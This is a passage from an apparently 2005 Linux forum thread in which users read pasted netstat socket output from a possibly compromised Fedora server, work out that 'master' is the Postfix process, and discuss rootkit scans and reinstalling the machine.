unix 3 [ ] STREAM CONNECTED 22748 5107/gnome-terminal /tmp/orbit-root/linc-13f3-0-618ed24758313
unix 3 [ ] STREAM CONNECTED 22747 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22746 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22745 5107/gnome-terminal
unix 3 [ ] STREAM CONNECTED 22744 5107/gnome-terminal /tmp/orbit-root/linc-13f3-0-618ed24758313
unix 3 [ ] STREAM CONNECTED 22743 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22740 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22739 5107/gnome-terminal
unix 3 [ ] STREAM CONNECTED 22734 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22733 5107/gnome-terminal
unix 3 [ ] STREAM CONNECTED 22647 5072/python /tmp/orbit-root/linc-13d0-0-79135e0847e32
unix 3 [ ] STREAM CONNECTED 22646 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22643 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22642 5072/python
unix 3 [ ] STREAM CONNECTED 22641 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22640 5072/python
unix 3 [ ] STREAM CONNECTED 22638 5066/gnome-panel /tmp/orbit-root/linc-13ca-0-5c04673fb9fb8
unix 3 [ ] STREAM CONNECTED 22637 5105/wnck-applet
unix 3 [ ] STREAM CONNECTED 22636 5105/wnck-applet /tmp/orbit-root/linc-13f1-0-4f6434afdf143
unix 3 [ ] STREAM CONNECTED 22635 5066/gnome-panel
unix 3 [ ] STREAM CONNECTED 22628 5105/wnck-applet /tmp/orbit-root/linc-13f1-0-4f6434afdf143
unix 3 [ ] STREAM CONNECTED 22627 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22626 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22625 5105/wnck-applet
unix 3 [ ] STREAM CONNECTED 22624 5105/wnck-applet /tmp/orbit-root/linc-13f1-0-4f6434afdf143
unix 3 [ ] STREAM CONNECTED 22623 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22620 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22619 5105/wnck-applet
unix 3 [ ] STREAM CONNECTED 22614 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22613 5105/wnck-applet
unix 3 [ ] STREAM CONNECTED 22607 5066/gnome-panel /tmp/orbit-root/linc-13ca-0-5c04673fb9fb8
unix 3 [ ] STREAM CONNECTED 22606 5103/notification-a
unix 3 [ ] STREAM CONNECTED 22605 5103/notification-a /tmp/orbit-root/linc-13ef-0-4f6434af581e4
unix 3 [ ] STREAM CONNECTED 22604 5066/gnome-panel
unix 3 [ ] STREAM CONNECTED 22599 5103/notification-a /tmp/orbit-root/linc-13ef-0-4f6434af581e4
unix 3 [ ] STREAM CONNECTED 22598 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22597 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22596 5103/notification-a
unix 3 [ ] STREAM CONNECTED 22595 5103/notification-a /tmp/orbit-root/linc-13ef-0-4f6434af581e4
unix 3 [ ] STREAM CONNECTED 22594 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22591 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22590 5103/notification-a
unix 3 [ ] STREAM CONNECTED 22585 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22584 5103/notification-a
unix 3 [ ] STREAM CONNECTED 22570 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22569 5072/python
unix 3 [ ] STREAM CONNECTED 22553 5099/mapping-daemon /tmp/mapping-root
unix 3 [ ] STREAM CONNECTED 22546 5068/nautilus
unix 3 [ ] STREAM CONNECTED 22533 5076/gnome-vfs-daem /tmp/orbit-root/linc-13d4-0-742590725e6f6
unix 3 [ ] STREAM CONNECTED 22532 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22531 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22530 5076/gnome-vfs-daem
unix 3 [ ] STREAM CONNECTED 22525 5068/nautilus /tmp/orbit-root/linc-13cc-0-4e34f8a919b28
unix 3 [ ] STREAM CONNECTED 22524 5076/gnome-vfs-daem
unix 3 [ ] STREAM CONNECTED 22523 5076/gnome-vfs-daem /tmp/orbit-root/linc-13d4-0-742590725e6f6
unix 3 [ ] STREAM CONNECTED 22522 5068/nautilus
unix 3 [ ] STREAM CONNECTED 22519 5076/gnome-vfs-daem /tmp/orbit-root/linc-13d4-0-742590725e6f6
unix 3 [ ] STREAM CONNECTED 22518 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22515 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22514 5076/gnome-vfs-daem
unix 3 [ ] STREAM CONNECTED 22505 5068/nautilus /tmp/orbit-root/linc-13cc-0-4e34f8a919b28
unix 3 [ ] STREAM CONNECTED 22504 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22503 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22502 5068/nautilus
unix 3 [ ] STREAM CONNECTED 22492 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22491 5070/pam-panel-icon
unix 3 [ ] STREAM CONNECTED 22488 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22487 5070/pam-panel-icon
unix 3 [ ] STREAM CONNECTED 22481 5068/nautilus /tmp/orbit-root/linc-13cc-0-4e34f8a919b28
unix 3 [ ] STREAM CONNECTED 22480 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22477 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22476 5068/nautilus
unix 3 [ ] STREAM CONNECTED 22475 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22474 5068/nautilus
unix 3 [ ] STREAM CONNECTED 22469 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22468 5068/nautilus
unix 3 [ ] STREAM CONNECTED 22466 5066/gnome-panel /tmp/orbit-root/linc-13ca-0-5c04673fb9fb8
unix 3 [ ] STREAM CONNECTED 22465 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22464 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22463 5066/gnome-panel
unix 3 [ ] STREAM CONNECTED 22462 5066/gnome-panel /tmp/orbit-root/linc-13ca-0-5c04673fb9fb8
unix 3 [ ] STREAM CONNECTED 22461 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22458 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22457 5066/gnome-panel
unix 3 [ ] STREAM CONNECTED 22456 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22455 5066/gnome-panel
unix 3 [ ] STREAM CONNECTED 22450 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22449 5066/gnome-panel
unix 3 [ ] STREAM CONNECTED 22443 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22442 5064/metacity
unix 3 [ ] STREAM CONNECTED 22441 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22440 5064/metacity
unix 3 [ ] STREAM CONNECTED 22439 5064/metacity /tmp/orbit-root/linc-13c8-0-55f17d47e3b3f
unix 3 [ ] STREAM CONNECTED 22438 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22435 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22434 5064/metacity
unix 3 [ ] STREAM CONNECTED 22395 4962/gnome-settings /tmp/orbit-root/linc-1362-0-5fac0d92c7ccc
unix 3 [ ] STREAM CONNECTED 22394 4883/gnome-session
unix 3 [ ] STREAM CONNECTED 22391 4962/gnome-settings /tmp/orbit-root/linc-1362-0-5fac0d92c7ccc
unix 3 [ ] STREAM CONNECTED 22390 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22389 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22388 4962/gnome-settings
unix 3 [ ] STREAM CONNECTED 22301 4962/gnome-settings /tmp/orbit-root/linc-1362-0-5fac0d92c7ccc
unix 3 [ ] STREAM CONNECTED 22300 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22297 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22296 4962/gnome-settings
unix 3 [ ] STREAM CONNECTED 22291 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22290 4962/gnome-settings
unix 3 [ ] STREAM CONNECTED 22283 4883/gnome-session /tmp/orbit-root/linc-1313-0-548572a49c081
unix 3 [ ] STREAM CONNECTED 22282 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22281 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22280 4883/gnome-session
unix 2 [ ] DGRAM 22276 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22243 4883/gnome-session /tmp/orbit-root/linc-1313-0-548572a49c081
unix 3 [ ] STREAM CONNECTED 22242 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22241 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22146 4883/gnome-session
unix 2 [ ] DGRAM 22133 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22128 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 22127 4883/gnome-session
unix 2 [ ] DGRAM 20877 4850/pickup
unix 3 [ ] STREAM CONNECTED 3671 2873/xfs /tmp/.font-unix/fs7100
unix 3 [ ] STREAM CONNECTED 3670 3137/X
unix 5 [ ] STREAM CONNECTED 3676 3137/X /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 3655 3126/gdm-binary
unix 2 [ ] DGRAM 3306 2852/crond
unix 2 [ ] DGRAM 3230 2828/gpm
unix 2 [ ] DGRAM 3217 2826/nqmgr
unix 3 [ ] STREAM CONNECTED 3214 2816/master
unix 3 [ ] STREAM CONNECTED 3213 2816/master
unix 3 [ ] STREAM CONNECTED 3214 2816/master
unix 3 [ ] STREAM CONNECTED 3213 2816/master
unix 3 [ ] STREAM CONNECTED 3210 2816/master
unix 3 [ ] STREAM CONNECTED 3209 2816/master
unix 3 [ ] STREAM CONNECTED 3206 2816/master
unix 3 [ ] STREAM CONNECTED 3205 2816/master
unix 3 [ ] STREAM CONNECTED 3202 2816/master
unix 3 [ ] STREAM CONNECTED 3201 2816/master
unix 3 [ ] STREAM CONNECTED 3198 2816/master
unix 3 [ ] STREAM CONNECTED 3197 2816/master
unix 3 [ ] STREAM CONNECTED 3194 2816/master
unix 3 [ ] STREAM CONNECTED 3193 2816/master
unix 3 [ ] STREAM CONNECTED 3190 2816/master
unix 3 [ ] STREAM CONNECTED 3189 2816/master
unix 3 [ ] STREAM CONNECTED 3186 2816/master
unix 3 [ ] STREAM CONNECTED 3185 2816/master
unix 3 [ ] STREAM CONNECTED 3182 2816/master
unix 3 [ ] STREAM CONNECTED 3181 2816/master
unix 3 [ ] STREAM CONNECTED 3178 2816/master
unix 3 [ ] STREAM CONNECTED 3177 2816/master
unix 3 [ ] STREAM CONNECTED 3174 2816/master
unix 3 [ ] STREAM CONNECTED 3173 2816/master
unix 3 [ ] STREAM CONNECTED 3170 2816/master
unix 3 [ ] STREAM CONNECTED 3169 2816/master
unix 3 [ ] STREAM CONNECTED 3166 2816/master
unix 3 [ ] STREAM CONNECTED 3165 2816/master
unix 3 [ ] STREAM CONNECTED 3162 2816/master
unix 3 [ ] STREAM CONNECTED 3161 2816/master
unix 3 [ ] STREAM CONNECTED 3158 2816/master
unix 3 [ ] STREAM CONNECTED 3157 2816/master
unix 3 [ ] STREAM CONNECTED 3154 2816/master
unix 3 [ ] STREAM CONNECTED 3153 2816/master
unix 3 [ ] STREAM CONNECTED 3150 2816/master
unix 3 [ ] STREAM CONNECTED 3149 2816/master
unix 3 [ ] STREAM CONNECTED 3146 2816/master
unix 3 [ ] STREAM CONNECTED 3145 2816/master
unix 3 [ ] STREAM CONNECTED 3142 2816/master
unix 3 [ ] STREAM CONNECTED 3141 2816/master
unix 3 [ ] STREAM CONNECTED 3139 2816/master
unix 3 [ ] STREAM CONNECTED 3138 2816/master
unix 3 [ ] STREAM CONNECTED 3135 2816/master
unix 3 [ ] STREAM CONNECTED 3134 2816/master
unix 3 [ ] STREAM CONNECTED 3129 2816/master
unix 3 [ ] STREAM CONNECTED 3128 2816/master
unix 2 [ ] DGRAM 3111 2816/master
unix 2 [ ] DGRAM 2968 2710/xinetd
unix 2 [ ] DGRAM 2934 2698/named
unix 2 [ ] DGRAM 2927 2690/dovecot-auth
unix 3 [ ] STREAM CONNECTED 2933 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2926 2696/pop3-login
unix 3 [ ] STREAM CONNECTED 2932 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2925 2695/pop3-login
unix 3 [ ] STREAM CONNECTED 2931 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2924 2694/pop3-login
unix 3 [ ] STREAM CONNECTED 2930 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2923 2693/imap-login
unix 3 [ ] STREAM CONNECTED 2929 2690/dovecot-auth /var/run/dovecot-login/default

rioguia · 05-26-2005, 05:25 AM

unix 3 [ ] STREAM CONNECTED 2922 2692/imap-login
unix 3 [ ] STREAM CONNECTED 2928 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2921 2691/imap-login
unix 2 [ ] DGRAM 2920 2695/pop3-login
unix 2 [ ] DGRAM 2919 2696/pop3-login
unix 2 [ ] DGRAM 2918 2692/imap-login
unix 2 [ ] DGRAM 2917 2693/imap-login
unix 2 [ ] DGRAM 2916 2691/imap-login
unix 2 [ ] DGRAM 2915 2694/pop3-login
unix 3 [ ] STREAM CONNECTED 2914 2696/pop3-login
unix 3 [ ] STREAM CONNECTED 2913 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2912 2695/pop3-login
unix 3 [ ] STREAM CONNECTED 2911 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2910 2694/pop3-login
unix 3 [ ] STREAM CONNECTED 2909 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2908 2693/imap-login
unix 3 [ ] STREAM CONNECTED 2907 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2906 2692/imap-login
unix 3 [ ] STREAM CONNECTED 2905 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2904 2691/imap-login
unix 3 [ ] STREAM CONNECTED 2903 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2902 2690/dovecot-auth
unix 3 [ ] STREAM CONNECTED 2901 2664/dovecot
unix 2 [ ] DGRAM 2881 2686/named
unix 2 [ ] DGRAM 2853 2664/dovecot
unix 2 [ ] DGRAM 2725 2555/klogd

v00d00101 · 05-26-2005, 12:20 PM

My question would be, what is master? Is it an a/c you setup?

rioguia · 05-26-2005, 02:42 PM

I initially had the same question and I am trying to get more information.

I think that this is just Postfix (but I'm not sure). According to the program's author,

Quote:

Sockets and FIFOs are opened under control by /etc/postfix/master.cf (or whatever your master configuration file is). Each socket gives access to a class of Postfix daemons.

Capt_Caveman · 05-26-2005, 07:35 PM

This will explain in more detail than I can: http://www.postfix.org/master.8.html

What were the files you found in /tmp and /var/tmp? Who owned them? What processes were associated with them, etc. FWIW, the rOnin file is usually part of cracking toolkit.

Does chkrootkit report a clean scan now that it's running properly?

rioguia · 05-26-2005, 09:21 PM

i deleted the files. after reading from your security references, i realize i should have at least made a copy of the /tmp directory. I'll see if I can recover some of this information.

Yes, chkrootkit and rkhunter report no problems (but I still don't trust this box).

I have a clean install of Fedora Core 3 that I think will become my server and then i 'll just flatten this one (i've been meaning to try openbsd for a while now). I don't think it would have made much difference in this case since it was an application that was the source of the problem.